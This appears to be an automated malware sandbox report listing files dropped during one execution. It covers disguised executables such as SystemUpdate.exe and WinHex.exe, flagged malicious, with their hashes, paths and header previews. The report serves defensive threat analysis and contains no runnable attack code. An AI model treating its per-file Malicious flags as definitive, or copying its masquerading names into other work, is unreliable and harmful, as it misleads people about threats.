                                                                                                                      MD5:BC778F33480148EFA5D62B2EC85AAA7D
                                                                                                                      SHA1:B1EC87CBD8BC4398C6EBB26549961C8AAB53D855
                                                                                                                      SHA-256:9D4CF1C03629F92662FC8D7E3F1094A7FC93CB41634994464B853DF8036AF843
                                                                                                                      SHA-512:80C1DD9D0179E6CC5F33EB62D05576A350AF78B5170BFDF2ECDA16F1D8C3C2D0E991A5534A113361AE62079FB165FFF2344EFD1B43031F1A7BFDA696552EE173
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......T...T...T...T...TS.U...TZ.U...TS.U...TS.U...TS.U...T..U...T...T.T..U-..T..U...T..uT...T..U...TRich...T........PE..d......^.........." .....(...H.......%..............................................H.....`..............................................N..85..........s........K...j.. .......L.......8............................................ ..8............................text....&.......(.................. ..`.rdata...%...@...&...,..............@..@.data...!M...p...D...R..............@....pdata..TT.......V..................@..@.idata...V... ...X..................@..@.00cfg...............D..............@..@.rsrc...s............F..............@..@.reloc..5............N..............@..B................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI80722\python38.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4207672
                                                                                                                      Entropy (8bit):6.417541998036932
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:nRxxZK/eCt7uD6OOfC4xHpgFaDPsgAJO7K7rLUVWqoeAumLg2IXCIzIpg4HwJMYZ:PxZex7t8z7YUI2p5HAMYM60u
                                                                                                                      MD5:B8A6AA94B49A9230F554A15EE6E58B63
                                                                                                                      SHA1:BBB48404391262242F2DC3B7FEC045283A2C4416
                                                                                                                      SHA-256:021F222F0BACACC490081F5A37BD78148E34F22FABE89587E1E0C6841390B7C5
                                                                                                                      SHA-512:464D702B1291FD392CE767130F054A0D32B024480FFE4AD60FBC5CC6735031BE28D1839DB530F7A20B03B3EDA782D324482F38111D9E9AFC2CAE3579F07E52C2
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.s.vn..vn..vn......nn......tn......{n......}n......~n......rn..-...}n..vn..,o......n......wn......wn......wn..Richvn..................PE..d......_.........." ..........".....$.........................................B.....c.@...`...........................................8.....Xs9.|....`B......`@.......@.8....pB.Dt..Lb!.T............................b!.8............. .`............................text............................... ..`.rdata..,..... .....................@..@.data.........9.......9.............@....pdata.......`@.......=.............@..@.rsrc........`B.......?.............@..@.reloc..Dt...pB..v....?.............@..B........................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI80722\select.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28216
                                                                                                                      Entropy (8bit):6.1395240404041544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:S2wz1IkXvwhtHqS7tm7bNIXqGwDG4yycfUf2hm:S9IkXohtKS7tm7bNIXqG8yFUfp
                                                                                                                      MD5:F3702DFAFFAD5D95AC7022ABF84440F3
                                                                                                                      SHA1:A78D5994AAD9A82B8CFAFF1EF4EABA38BAB9CE7E
                                                                                                                      SHA-256:CEA18E860D251FBF4E9BF6E8689BA23B43DB4CDB9FD421270E8ED1C3B1AA4401
                                                                                                                      SHA-512:07CADC08BFB86633C8D54B717FB06217AF0C586DDADE537A6000AE662D2ADBD3107E30D32F28130041357D108EAF1F67A13AE3858BE0D18DAF2123666D2C26C5
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B..O,..O,..O,..7...O,.0>-..O,.0>)..O,.0>(..O,.0>/..O,..=-..O,..'-..O,..O-..O,..=!..O,..=,..O,..=...O,..=...O,.Rich.O,.........................PE..d...1.._.........." .........4......X.....................................................`..........................................@..L....A..x....p.......`.......P..8.......8....2..T........................... 3..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..8............N..............@..B................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI80722\unicodedata.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1098296
                                                                                                                      Entropy (8bit):5.34438566669037
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:9Q9e3qQOZ63191SnFRFotduNYBjCmN/XlyCAx9++bBlhJk93cgewrxEeBkmi:9Q9e3GS4olhCc/+9nbDhG2wrxkmi
                                                                                                                      MD5:B36DBBFDBE686F33D50414C288C1ACB8
                                                                                                                      SHA1:B389D6A8BDD9BB7D2B579A48E8E9BA94FCA499BF
                                                                                                                      SHA-256:5ED7787555704626DA817B872C60EAC09B984FFDF00D5AACDF06B6D9A935B105
                                                                                                                      SHA-512:7AD66BB84B38B8153279C17AC80BE44D0F3B96A937A906FB2DCAF664FBB9D0CB696A0D8AD8942951E68EF6B7AC7855FBC5B59BCA03D262471B9F74809DB5AC91
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.b~&..-&..-&..-/..- ..-...,$..-...,*..-...,...-...,%..-...,%..-}..,$..-&..-l..-...,'..-...,'..-...-'..-...,'..-Rich&..-........PE..d...4.._.........." .....L...Z.......)....................................................`.............................................X...8...................<.......8...........`)..T............................)..8............`...............................text....J.......L.................. ..`.rdata.......`...0...P..............@..@.data...............................@....pdata..<...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ni3ysk1.l5t.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_df4br3ma.qui.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehlw1ltp.jrj.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdfmap1l.bcn.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzmtytzu.3hv.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixgj11mr.yqy.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kq3gj20z.d2g.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oex04krd.twa.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\SystemUpdate.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5387223
                                                                                                                      Entropy (8bit):7.985206938856671
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:AfXpzoLLJ3TbwaVvrZE0I8VkgCPOGCWxMa7kC9dob2MlVJqL2k+m7:Av9onJ5hrZEAktPOKjPob2M7YL
                                                                                                                      MD5:6BDDA8BA15F8F472FE7D065689E7D35D
                                                                                                                      SHA1:95D44FF3A6E24F1A53BA0DB640A08A727C864109
                                                                                                                      SHA-256:55DC50526FF1F3265E54280421BD518B15A8D7475C8A91744D8FE6FFA9AA7C4D
                                                                                                                      SHA-512:D0FD1482054E1408E374CEB30D5C400B6E5D8CB48B0DCFEB4F0364E35D46F3146CDAF78A3D7BB997E25054EB044DCEACD84FEFED9379CC6D020EF9B0BA5FF5CF
                                                                                                                      Malicious:true
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W.W.W../.W../..1W../...W..+...W..+...W..+...W..+.W../.W.W..W.3+...W.3+.W.Rich.W.................PE..d....=dg.........."....".......................@......................................R...`.....................................................x.... ...H....... ...........p..X...................................@...@............................................text............................... ..`.rdata...+.......,..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc....H... ...J..................@..@.reloc..X....p.......4..............@..B........................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\WinHex.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe
                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19293911
                                                                                                                      Entropy (8bit):7.626940406045079
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:393216:99uDI2bmAyYMF3hsZP4Mk0WCXCEqyJDDUSyE+r9QfPsilLI1z0tC3I0Coipi20Ua:7uDI2bmfYuhIfWjQflorgu1zXjCoDiyu
                                                                                                                      MD5:EFDC5DBA52333C0F5EEEDB0308FBE2D0
                                                                                                                      SHA1:302AB4512EC697F95CD23C9001D04C43AF18E07E
                                                                                                                      SHA-256:D318CA324ED55593629D9D4B59E72A0D61E47F855714EB4A128FADC07D1F4363
                                                                                                                      SHA-512:62D69091E7E5F73DA141B716DABA26B1AE168FF7AFDDAB08F1378F35719A6ED3E10D199806FB58F6BEE9AB006F6CDCA428B7ECEA5A7ED49C0168C1E4C46905AA
                                                                                                                      Malicious:true
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W.W.W../.W../..1W../...W..+...W..+...W..+...W..+.W../.W.W..W.3+...W.3+.W.Rich.W.................PE..d.....eg.........."....".......................@....................................K.&...`.....................................................x.... ...H....... ...........p..X...................................@...@............................................text............................... ..`.rdata...+.......,..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc....H... ...J..................@..@.reloc..X....p.......4..............@..B........................................................................................................................................................................................................

                                                                                                                      C:\Windows\Logs\MoSetup\BlueBox.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1938
                                                                                                                      Entropy (8bit):5.266003803096758
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:xRO04H4DeYpCP7A94abTzQvy0s3n3eaPFHDhFDwDgEqu0eY030pa:xQ04H4iY0P7A94abTzQvy0s3nOaPFHl4
                                                                                                                      MD5:ED88C1BD8C3C7C48784B38C300BC105F
                                                                                                                      SHA1:7415E90D7A1C98581F64E536850A9629F9F89EAB
                                                                                                                      SHA-256:340213F7E1FE9EFB0B60BF93939C821ABBB5CA05AA98D1F37B3D6E04903B0496
                                                                                                                      SHA-512:FD288F04C43DF70DCC7729C96BAC44DDB74C298119E5684D6EAE1A6131B96F4CDF370E13378833275800044497CE08F155BEC2606EE0BD0CEA5CD87300BCF106
                                                                                                                      Malicious:false
                                                                                                                      Preview:.2024-12-29 07:39:05: BuildInfo: [10.0.19041.572 (vb_release_svc_prod1.201007-1724)]..2024-12-29 07:39:05: CommandLine: [C:\Users\user\AppData\Roaming\../LineInst.exe]..2024-12-29 07:39:05: Opening Box: [C:\Users\user\AppData\LineInst.exe]..2024-12-29 07:39:05: Opening Box Result: [0x0]..2024-12-29 07:39:05: Deleting box result.....2024-12-29 07:39:06: Creating path: [C:\$Windows.~WS\Sources].....2024-12-29 07:39:06: Checking cleanup registry value.....2024-12-29 07:39:06: Cleanup value missing... assuming no cleanup...2024-12-29 07:39:06: Skipping cleanup...2024-12-29 07:39:06: Preserve working path: [No]..2024-12-29 07:39:06: Cleaning alternate storage paths.....2024-12-29 07:39:06: Cleaning MoSetup Volatile key.....2024-12-29 07:39:06: Removing CorrelationVector registry value.....2024-12-29 07:39:06: Removing cleanup registry value.....2024-12-29 07:39:06: Flushing MoSetup registry key.....2024-12-29 07:39:06: Cleaning working dir.....2024-12-29 07:39:06: Attempting to preserve

                                                                                                                      C:\Windows\Panther\DlTel.etl

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):0.09695366570663645
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:zGYl+GJXx2EuMclF6vMclFq5zweHa1xaylzE5Zm3n+Sk4DtLJz7:a6Xx2HF69Fq5zC1xaME5Z2+kDPH
                                                                                                                      MD5:90F1E01CE360CE074DB195C29ABB10DD
                                                                                                                      SHA1:914741177E3A4226A4E7C694F55F774383AC8980
                                                                                                                      SHA-256:4C3E456448BCD1AB516CFC50942457FE4094289E520975E373C0A66537C4C150
                                                                                                                      SHA-512:F7725C23234E84F8876146E2A445023F62FE650DB6D3C3FA85F53C50601B90BCA0E53AA4343B4D8CBEE9602CAF530C4BE6CBDD1667871A9C91379571E6235296
                                                                                                                      Malicious:false
                                                                                                                      Preview:....H...H.......................................H...!......................................k....................eJ..............Zb......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.............g...Y..........S.P._.D.O.W.N.L.E.V.E.L._.T.E.L.E.M.E.T.R.Y._.E.T.W._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.P.a.n.t.h.e.r.\.D.l.T.e.l...e.t.l.......P.P............k............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:JSON data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):55
                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                      Malicious:false
                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                      Chrome Cache Entry: 274

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (524)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):980
                                                                                                                      Entropy (8bit):5.221020544248936
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:ckGytSvuT/y67L/nV9jViHwukcglwYVTYVu:catwuby67pLRuxmwCTCu
                                                                                                                      MD5:EC8AED9DF755A7B27E52317DCF532DF8
                                                                                                                      SHA1:60F03B5BF43D1682D1CDB7DAF5A5A37FCD29D4E8
                                                                                                                      SHA-256:C152DD3ED8493299EA2712FFC15A0043F417FEDCF4159B2C993A006501D82AC4
                                                                                                                      SHA-512:16890D243CE2236AA2CD01C3C85D7B0AA1DB3DC8BF8B9CFE97AD18889F4030A0B6511C9F82C62F2BDA5F1029AFF4E12A9E35B0E182FC3B2B8B677618A589F5CF
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/socialfollow/v1/socialfollow/clientlibs/site.min.ACSHASHec8aed9df755a7b27e52317dcf532df8.js
                                                                                                                      Preview:'use strict';$(document).ready(function(){var a=window.matchMedia("(prefers-color-scheme: dark)");a.addEventListener("change",function(k){{const d=document.querySelectorAll(".socialfollow .socialfollow-li img");if(d)for(var e=0;e<d.length;e++){var b=d[e].getAttribute("src"),g=d[e].getAttribute("data-src");b&&(k.matches?(-1<b.indexOf("\x26fmt\x3dpng-alpha")&&(b=b.replace("\x26fmt\x3dpng-alpha",""),d[e].setAttribute("src",b)),-1<b.indexOf("?fmt\x3dpng-alpha")&&(b=b.replace("?fmt\x3dpng-alpha",""),d[e].setAttribute("src",.b))):g&&d[e].setAttribute("src",g))}}});if(a.matches&&(a=document.querySelectorAll(".socialfollow .socialfollow-li img")))for(var f=0;f<a.length;f++){var c=a[f].getAttribute("src"),h=a[f].getAttribute("data-src");c&&(-1<c.indexOf("\x26fmt\x3dpng-alpha")?(c=c.replace("\x26fmt\x3dpng-alpha",""),a[f].setAttribute("src",c)):-1<c.indexOf("?fmt\x3dpng-alpha")?(c=c.replace("?fmt\x3dpng-alpha",""),a[f].setAttribute("src",c)):h&&a[f].setAttribute("src",h))}});

                                                                                                                      Chrome Cache Entry: 275

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):631
                                                                                                                      Entropy (8bit):6.391875872958697
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:6v/7s6UVprYe6IZeuLgou+/CAztgbbvCR00aJzS4VQIjXuYEMwoQIjXuHBOLPMdo:hX7rRkf+/rMcCJzAIjNEMwNIj8Efl9
                                                                                                                      MD5:FB2ED9313C602F40B7A2762ACC15FF89
                                                                                                                      SHA1:8A390D07A8401D40CBC1A16D873911FA4CB463F5
                                                                                                                      SHA-256:B241D02FAB4B17291AF37993EB249F9303EB5897610ABAFAC4C9F6AA6A878369
                                                                                                                      SHA-512:9CBCF5C7B8409494F6D543434ECAFF42DE8A2D0632A17931062D7D1CC130D43E61162EEDB0965B545E65E0687DED4D4B51E29631568AF34B157A7D02A3852508
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...{PLTE.P".J$x......P".P".J$x.........K..K..K..D.o..w..w..w.........................................................P"...................$tRNS.DD...CC..DEC..CEDDEC..CED...CC...DD.c,8....bKGD(........pHYs...........~.....tIME....."4...4...QIDAT8...G.. ...Q..s....?......s.f..a`.A... .bA!..,/dYQ.....a.((j^.m?4..Q.?.....2>.........%tEXtdate:create.2020-05-28T22:34:52+02:00.t.....%tEXtdate:modify.2020-05-28T22:34:52+02:00.)<'...WzTXtRaw profile type iptc..x.....qV((.O..I.R..#..c..#.K.... D.4.d.#.T ...........H.J.....t.B5.....IEND.B`.

                                                                                                                      Chrome Cache Entry: 276

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):279
                                                                                                                      Entropy (8bit):4.9476583285591245
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:/csgP0KOFMLs9cVNKmV+oOEbFNRbvb2RCXgZ:/RLUN+jEb/RbdXW
                                                                                                                      MD5:E1F0A24D32A3CAAED1D3B99783BE4B37
                                                                                                                      SHA1:7ECBD8083A8DBB1BCCE690620951E11BC1827841
                                                                                                                      SHA-256:24E3F2E2B95B3EEA8F74E0341E55A4FD71581931179FE467CA97BA5DFEA9F011
                                                                                                                      SHA-512:01FDAA5167A44D1545A7C280412BB4F7C7F6FAD4A33E3DD0122B86C3E377E204CFAF187A6E535D49C071663214C90F0904CDD3969231750D8D4A252228839D31
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/tablecomponent/v1/tablecomponent/clientlibs/site.min.ACSHASHe1f0a24d32a3caaed1d3b99783be4b37.css
                                                                                                                      Preview:.table .sr-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal !important}..table-first-col-highlight tr td:first-child:not(:last-child){background-color:rgba(230,230,230,.5)}

                                                                                                                      Chrome Cache Entry: 277

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 150177
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):52015
                                                                                                                      Entropy (8bit):7.9952734547685935
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:vJhGm+7PUzhQu7xb5fpuSijlAVYYHNkPyJvs:RoA9l7FPRuAVYYHiPyJvs
                                                                                                                      MD5:5F28D22CDF37837FA88F08A2050983AF
                                                                                                                      SHA1:2FC8592FB2E4BE8193919AD56EE8588B24E7C0BE
                                                                                                                      SHA-256:6E207B57EF73C7406D23E2533231E94B58B3C52AC63D208EC6664B152EC5B544
                                                                                                                      SHA-512:DD526C86ACD7D940E54F9F6F848F03A4881DF9E17A067E7231E3D1765D846D0741FAFA8D7C89395B644CB6E0CB71098807411A0F534EA148379D23D31A032104
                                                                                                                      Malicious:false
                                                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/FetchSessions_Core_9mEr1-U6IfYSYEIq9V-gwA2.js
